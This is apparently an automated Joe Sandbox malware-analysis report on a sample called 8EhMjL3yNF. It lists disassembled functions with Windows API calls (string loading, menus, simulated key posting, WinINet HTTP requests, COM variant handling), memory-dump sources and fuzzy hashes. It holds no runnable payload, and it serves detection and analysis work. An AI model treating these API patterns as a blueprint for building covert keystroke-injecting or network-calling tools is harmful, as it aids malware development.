                                                                                                                                                                  • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                                                                                                                  • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LoadString
                                                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                  • API String ID: 2948472770-2354261254
                                                                                                                                                                  • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                                                                  • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                                                                                                                  • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                                                                  • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                                                                                                  • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LoadString
                                                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                  • API String ID: 2948472770-8599901
                                                                                                                                                                  • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                                                                                  • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                                                                                                                  • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                                                                                  • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                                                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                                                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleLoadModuleString
                                                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                                                                                                                  • API String ID: 3590730445-2561132961
                                                                                                                                                                  • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                                                                                  • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                                                                                                                  • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                                                                                  • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateMenu.USER32 ref: 00448603
                                                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                                                                                                  • IsMenu.USER32(?), ref: 004486AB
                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 004486B5
                                                                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                                                                                                  • DrawMenuBar.USER32 ref: 004486F5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 161812096-4108050209
                                                                                                                                                                  • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                                                                  • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                                                                                                                  • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                                                                  • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                                                                                                  • LoadStringW.USER32(00000000), ref: 00454040
                                                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                   • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleLoadMessageModuleString
                                                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                  • API String ID: 2734547477-4153970271
                                                                                                                                                                  • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                                                                  • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                                                                                                                  • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                                                                  • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetParent.USER32 ref: 00445BF8
                                                                                                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                   • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClassMessageNameParentSend
                                                                                                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                  • API String ID: 1290815626-3381328864
                                                                                                                                                                  • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                                                                                  • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                                                                                                                  • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                                                                                  • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                   • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                                                                                  • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                                                                                                                  • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                                                                                  • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                   • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                                                                  • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                                                                                                                  • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                                                                  • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                   • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitVariant
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1927566239-0
                                                                                                                                                                  • Opcode ID: 39db4700839c78748f1f65349aed29dd0ec4a76af68a2367c5464c8cf9b097ff
                                                                                                                                                                  • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                                                                                                                  • Opcode Fuzzy Hash: 39db4700839c78748f1f65349aed29dd0ec4a76af68a2367c5464c8cf9b097ff
                                                                                                                                                                  • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00445AA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00445AC7
                                                                                                                                                                    • Part of subcall function 00445AA7: GetCurrentThreadId.KERNEL32 ref: 00445ACE
                                                                                                                                                                    • Part of subcall function 00445AA7: AttachThreadInput.USER32(00000000), ref: 00445AD5
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445E6F
                                                                                                                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445E88
                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445E96
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445E9C
                                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445EBD
                                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00445ECB
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445ED1
                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445EE6
                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445EEE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                   • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2014098862-0
                                                                                                                                                                  • Opcode ID: 5ca03ddf5c5627d7609a553b695717aade5f72ce3845e2189486292beca2fa90
                                                                                                                                                                  • Instruction ID: 3cb45b36699f005c3339592b7719367c9fd6f04972b18b3a4454280c1561912d
                                                                                                                                                                  • Opcode Fuzzy Hash: 5ca03ddf5c5627d7609a553b695717aade5f72ce3845e2189486292beca2fa90
                                                                                                                                                                  • Instruction Fuzzy Hash: 44115671390300BBF6209B959D8AF5A775DEB98B11F20490DFB80AB1C1C5F5A4418B7C
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
• Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
• Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
• Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
APIs
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
• Sleep.KERNEL32(0000000A), ref: 0042C67F
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Interlocked$DecrementIncrement$Sleep
• String ID: @COM_EVENTOBJ
• API String ID: 327565842-2228938565
• Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
• Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
• Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
• Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
APIs
• VariantClear.OLEAUT32(?), ref: 0047031B
• VariantClear.OLEAUT32(?), ref: 0047044F
• VariantInit.OLEAUT32(?), ref: 004704A3
• DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
• VariantClear.OLEAUT32(?), ref: 00470516
  • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
• VariantCopy.OLEAUT32(?,?), ref: 0047057A
  • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
• VariantClear.OLEAUT32(00000000), ref: 0047060D
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Variant$Clear$Copy$CallDispFuncInit
• String ID: H
• API String ID: 3613100350-2852464175
• Opcode ID: c6d40e7720115016f6dd6d57d99e1fbe71660f2569812f1c51c69f5f3bbdc767
• Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
• Opcode Fuzzy Hash: c6d40e7720115016f6dd6d57d99e1fbe71660f2569812f1c51c69f5f3bbdc767
• Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
• DestroyWindow.USER32(?), ref: 00426F50
• UnregisterHotKey.USER32(?), ref: 00426F77
• FreeLibrary.KERNEL32(?), ref: 0042701F
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
• String ID: close all
• API String ID: 4174999648-3243417748
• Opcode ID: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
• Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
• Opcode Fuzzy Hash: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
• Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
• HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
• String ID:
• API String ID: 1291720006-3916222277
• Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
• Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
• Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
• Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
• SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
• SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
• SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
Strings
Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
